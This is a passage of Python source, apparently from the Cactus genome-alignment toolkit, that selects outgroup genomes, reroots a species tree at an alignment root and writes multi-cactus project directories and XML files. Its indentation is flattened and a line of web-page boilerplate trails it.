mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
candidateSet=options.outgroupNames,
candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
maxNumOutgroups=config.getMaxNumOutgroups())
elif config.getOutgroupStrategy() == 'greedyLeaves':
# use all leaves as outgroups, unless outgroup candidates are given
mcProj.outgroup = GreedyOutgroup()
mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
ogSet = options.outgroupNames
if ogSet is None:
ogSet = set([mcProj.mcTree.getName(x) for x in mcProj.mcTree.getLeaves()])
mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
candidateSet=ogSet,
candidateChildFrac=2.0,
maxNumOutgroups=config.getMaxNumOutgroups())
elif config.getOutgroupStrategy() == 'greedyPreference':
# prefer the provided outgroup candidates, if any, but use
# other nodes as "filler" if we can't find enough.
mcProj.outgroup = GreedyOutgroup()
mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
candidateSet=options.outgroupNames,
candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
maxNumOutgroups=config.getMaxNumOutgroups())
mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
candidateSet=None,
candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
maxNumOutgroups=config.getMaxNumOutgroups())
elif config.getOutgroupStrategy() == 'dynamic':
# dynamic programming algorithm that exactly optimizes probability
# that base in target node aligns to at least one base in the
# outgroup set. Caveats are that it only returns leaves, and
# the model used for optimization is super naive. Still, it does
# some things better than greedy approaches such as properly account
# for phylogenetic redundancy, as well as try to factor assembly
# size/quality automatically.
mcProj.outgroup = DynamicOutgroup()
mcProj.outgroup.importTree(mcProj.mcTree, mcProj.getInputSequenceMap(), alignmentRootId,
candidateSet=options.outgroupNames)
mcProj.outgroup.compute(maxNumOutgroups=config.getMaxNumOutgroups())
elif config.getOutgroupStrategy() != 'none':
raise RuntimeError("Could not understand outgroup strategy %s" % config.getOutgroupStrategy())
# if necessary, we reroot the tree at the specified alignment root id. all leaf genomes
# that are no longer in the tree, but still used as outgroups, are moved into special fields
# so that we can remember to, say, get their paths for preprocessing.
specifyAlignmentRoot(mcProj, alignmentRootId)
return mcProj
# it is possible that we start with a much bigger tree than we actually want to align
# (controlled by the --root option in cactus_createMultiCactusProject.py). We use
# the entire tree when selecting outgroups, but right afterward have no use for
# genomes that are neither outgroups, nor in the alignment. We especially don't
# want to waste time preprocessing them. This function, reroots the tree at the
# alignment root then tacks on all the outgroups from ooutside the new tree
# (which must be leaves) as children of the root
def specifyAlignmentRoot(mcProj, alignmentRootId):
# ugly hack to keep track of external outgroups for root experiment (yuck)
mcProj.externalOutgroupNames = set()
# keep around the entire un-rerooted tree so that we can calculate
# the induced species trees for each node correctly -- gross!
mcProj.entireTree = copy.deepcopy(mcProj.mcTree)
# nothing to do
if alignmentRootId == mcProj.mcTree.getRootId():
return
# dig out every outgroup
outGroupNames = set()
if mcProj.outgroup is not None:
for event, ogNameDistList in mcProj.outgroup.ogMap.items():
for og, dist in ogNameDistList:
outGroupNames.add(og)
# i don't like this but we have to assume here that the sequences are
# written in postorder (as in experiments)
allLeafMap = dict()
idx = 0
for node in mcProj.mcTree.postOrderTraversal():
if mcProj.mcTree.isLeaf(node) is True:
allLeafMap[mcProj.mcTree.getName(node)] = mcProj.inputSequences[idx]
idx += 1
# find outgroups we want to extract
keptNodes = set([x for x in mcProj.mcTree.postOrderTraversal(alignmentRootId)])
deadNodes = []
extractOutgroupMap = dict()
for node in mcProj.mcTree.postOrderTraversal():
if node not in keptNodes:
deadNodes.append(node)
name = mcProj.mcTree.getName(node)
if name in outGroupNames:
assert name in allLeafMap
extractOutgroupMap[name] = allLeafMap[name]
mcProj.externalOutgroupNames.add(name)
# reroot the tree!
mcProj.mcTree.reroot(alignmentRootId)
# add the outgroups to the tree (and sequence map)
# computing distance to new root for each one
for ogName, ogPath in extractOutgroupMap.items():
ogId = mcProj.mcTree.getNodeId(ogName)
dist = 0.
x = ogId
while mcProj.mcTree.hasParent(x):
d = mcProj.mcTree.getWeight(mcProj.mcTree.getParent(x), x)
if d is None:
dist = None
break
else:
dist += d
x = mcProj.mcTree.getParent(x)
mcProj.mcTree.addOutgroup(ogName, dist)
allLeafMap[ogName] = ogPath
# remove any experiment directories that have become invalid
for event in mcProj.expMap.keys():
if mcProj.mcTree.getNodeId(event) in deadNodes:
del mcProj.expMap[event]
# flush out all unused nodes, and set the new root
for node in deadNodes:
assert mcProj.mcTree.hasParent(node)
mcProj.mcTree.removeEdge(mcProj.mcTree.getParent(node), node)
# reset input sequences to only contain genomes in tree (making sure to
# keep in postorder)
mcProj.inputSequences = []
for node in mcProj.mcTree.postOrderTraversal():
if mcProj.mcTree.isLeaf(node):
mcProj.inputSequences.append(allLeafMap[mcProj.mcTree.getName(node)])
# go through the tree (located in the template experimet)
# and make sure event names are unique up unitil first dot
def cleanEventTree(experiment):
tree = MultiCactusTree(experiment.getTree())
tree.nameUnlabeledInternalNodes()
for node in tree.breadthFirstTraversal():
if tree.hasName(node):
name = tree.getName(node)
if '.' in name:
newName = name.replace('.', '_')
sys.stderr.write('WARNING renaming event %s to %s\n' %(name, newName))
tree.setName(node, newName)
name = newName
parent = tree.getParent(node)
if parent is not None:
weight = tree.getWeight(parent, node)
if weight is None:
raise RuntimeError('Missing branch length in species_tree tree')
redoPrefix = True
newSuffix = 0
while redoPrefix is True:
redoPrefix = False
for node1 in tree.breadthFirstTraversal():
name1 = tree.getName(node1)
for node2 in tree.breadthFirstTraversal():
name2 = tree.getName(node2)
if node1 != node2 and name1 == name2:
newName = "%s%i" % (name2, newSuffix)
newSuffix += 1
tree.setName(node2, newName)
sys.stderr.write('WARNING renaming event %s to %s\n' % (
name2, newName))
redoPrefix = True
experiment.xmlRoot.attrib["species_tree"] = NXNewick().writeString(tree)
experiment.seqMap = experiment.buildSequenceMap()
# Make the subdirs for each subproblem: name/ and name/name_DB
# and write the experiment files
# and copy over a config with updated reference field
def createFileStructure(mcProj, expTemplate, configTemplate, options):
if not os.path.exists(options.path):
os.makedirs(options.path)
mcProj.writeXML(os.path.join(options.path, "%s_project.xml" % options.name))
seqMap = expTemplate.seqMap
portOffset = 0
for name, expPath in mcProj.expMap.items():
path = os.path.join(options.path, name)
seqMap[name] = os.path.join(path, name + '.fa')
for name, expPath in mcProj.expMap.items():
path = os.path.join(options.path, name)
children = mcProj.entireTree.getChildNames(name)
exp = copy.deepcopy(expTemplate)
# Get outgroups
outgroups = []
if configTemplate.getOutgroupStrategy() != 'none' \
and name in mcProj.outgroup.ogMap:
for og, ogDist in mcProj.outgroup.ogMap[name]:
assert og in seqMap, "No sequence found for outgroup: %s" % og
outgroups += [og]
# Get subtree connecting children + outgroups
assert len(children) > 0
subtree = mcProj.entireTree.extractSpanningTree(children + outgroups)
dbBase = path
if expTemplate.getDbDir() is not None:
dbBase = os.path.abspath(expTemplate.getDbDir())
exp.setDbDir(os.path.join(dbBase, name, "%s_DB" % name))
if expTemplate.getDbType() == "kyoto_tycoon" and \
os.path.splitext(name)[1] != ".kch":
exp.setDbName("%s.kch" % name)
else:
exp.setDbName(name)
if expTemplate.getDbType() == "kyoto_tycoon":
exp.setDbPort(expTemplate.getDbPort() + portOffset)
portOffset += 1
host = expTemplate.getDbHost()
if host is not None:
exp.setDbHost(host)
exp.setReferencePath(os.path.join(path, name + '.fa'))
if configTemplate.getBuildHal() == True:
exp.setHALPath(os.path.join(path, "%s_hal.c2h" % name))
if configTemplate.getBuildFasta() == True:
exp.setHALFastaPath(os.path.join(path, "%s_hal.fa" % name))
exp.updateTree(subtree, seqMap, outgroups)
exp.setConfigPath(os.path.join(path, "%s_config.xml" % name))
if not os.path.exists(exp.getDbDir()):
os.makedirs(exp.getDbDir())
if not os.path.exists(path):
os.makedirs(path)
exp.writeXML(expPath)
config = ConfigWrapper(copy.deepcopy(configTemplate.xmlRoot))
config.setReferenceName(name)
config.writeXML(exp.getConfigPath())
class CreateMultiCactusProjectOptions:
def __init__(self, expFile, projectFile, fixNames,
outgroupNames, rootOutgroupDists, rootOutgroupPaths,
root, overwrite):
self.expFile = expFile
self.path = projectFile
self.fixNames = fixNames
self.name = os.path.basename(self.path)
self.outgroupNames = outgroupNames
self.rootOutgroupDists = rootOutgroupDists
self.rootOutgroupPaths = rootOutgroupPaths
self.root = root
self.overwrite = overwrite
def runCreateMultiCactusProject(expFile, projectFile, fixNames=False,
outgroupNames=None, rootOutgroupDists=None, rootOutgroupPaths=None,
root=None, overwrite=False):
options = CreateMultiCactusProjectOptions(expFile, projectFile, fixNames=fixNames,
outgroupNames=outgroupNames, rootOutgroupDists=rootOutgroupDists,
rootOutgroupPaths=rootOutgroupPaths, root=root, overwrite=overwrite)
expTemplate = ExperimentWrapper(ET.parse(options.expFile).getroot())
configPath = expTemplate.getConfigPath()
confTemplate = ConfigWrapper(ET.parse(configPath).getroot())
if options.fixNames:
cleanEventTree(expTemplate)
tree = expTemplate.getTree()
if options.outgroupNames is not None:
options.outgroupNames = set(options.outgroupNames)
projNames = set([tree.getName(x) for x in tree.getLeaves()])
for outgroupName in options.outgroupNames:
if outgroupName not in projNames:
raise RuntimeError("Specified outgroup %s not found in tree" % outgroupName)
mcProj = createMCProject(tree, expTemplate, confTemplate, options)
#Replace the sequences with output sequences
expTemplate.updateTree(mcProj.mcTree, expTemplate.buildSequenceMap())
expTemplate.setSequences(CactusPreprocessor.getOutputSequenceFiles(mcProj.inputSequences, expTemplate.getOutputSequenceDir()))
if options.rootOutgroupPaths is not None:
# hacky -- add the root outgroup to the tree after everything
# else. This ends up being ugly, but avoids running into
# problems with assumptions about tree structure
#
# [this hack is hopefully made redundant by the --root option]
#
mcProj.inputSequences.extend(options.rootOutgroupPaths)
# replace the root outgroup sequence by post-processed output
for i, (outgroupPath, outgroupDist) in enumerate(zip(options.rootOutgroupPaths, options.rootOutgroupDists)):
outgroupPath = CactusPreprocessor.getOutputSequenceFiles(expTemplate.getSequences() + options.rootOutgroupPaths[:i+1], expTemplate.getOutputSequenceDir())[-1]
rootOutgroupName = "rootOutgroup%d" % i
expTemplate.seqMap[rootOutgroupName] = outgroupPath
# Add to tree
mcProj.mcTree.addOutgroup(rootOutgroupName, outgroupDist)
mcProj.mcTree.computeSubtreeRoots()
if mcProj.mcTree.getRootName() not in mcProj.outgroup.ogMap:
# initialize ogMap entry
mcProj.outgroup.ogMap[mcProj.mcTree.getRootName()] = []
mcProj.outgroup.ogMap[mcProj.mcTree.getRootName()].append((rootOutgroupName, outgroupDist))
#Now do the file tree creation
createFileStructure(mcProj, expTemplate, confTemplate, options)
# mcProj.check()
def main():
usage = "usage: %prog [options] <experiment> <output project path>"
description = "Setup a multi-cactus project using an experiment xml as template"
parser = OptionParser(usage=usage, description=description)
parser.add_option("--fixNames", dest="fixNames", default = "True",
help="try to make sequence and event names MAF-compliant [default=true]")
parser.add_option("--outgroupNames", dest="outgroupNames", default = None,
help="comma-separated names of high quality assemblies to use as outgroups [default=everything]")
parser.add_option("--root", dest="root", type=str,
help="name of alignment root (must be labeled ancestral node in tree in input experiment). Useful "
"for allowing the tree to contain nodes that won't be in the alignment but can still be used for "
"outgroups.",
default=None)
parser.add_option("--overwrite", action="store_true", help="Overwrite existing experiment files", default=False)
options, args = parser.parse_args()
if len(args) != 2:
parser.print_help()
raise RuntimeError("Wrong number of arguments")
options.expFile = args[0]
options.path = os.path.abspath(args[1])
options.name = os.path.basename(options.path)
options.fixNames = not options.fixNames.lower() == "false"
if (os.path.isdir(options.path) and not options.overwrite) or os.path.isfile(options.path):
raise RuntimeError("Output project path %s exists\n" % options.path)
expTemplate = ExperimentWrapper(ET.parse(options.expFile).getroot())
configPath = expTemplate.getConfigPath()
confTemplate = ConfigWrapper(ET.parse(configPath).getroot())
if options.fixNames:
cleanEventTree(expTemplate)
tree = expTemplate.getTree()
# Check that the tree is sensible (root has at least 1 child)
if len(tree.getChildren(tree.getRootId())) == 0:
raise RuntimeError("Input species tree has only one node.")
if options.outgroupNames is not None:
projNames = set([tree.getName(x) for x in tree.getLeaves()])
options.outgroupNames = set(options.outgroupNames.split(","))
for outgroupName in options.outgroupNames:
if outgroupName not in projNames:
raise RuntimeError("Specified outgroup %s not found in tree" % outgroupName)
mcProj = createMCProject(tree, expTemplate, confTemplate, options)
#Replace the sequences with output sequences
expTemplate.updateTree(mcProj.mcTree, expTemplate.buildSequenceMap())
expTemplate.setSequences(CactusPreprocessor.getOutputSequenceFiles(mcProj.inputSequences, expTemplate.getOutputSequenceDir()))
#Now do the file tree creation
createFileStructure(mcProj, expTemplate, confTemplate, options)
# mcProj.check()
return 0
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.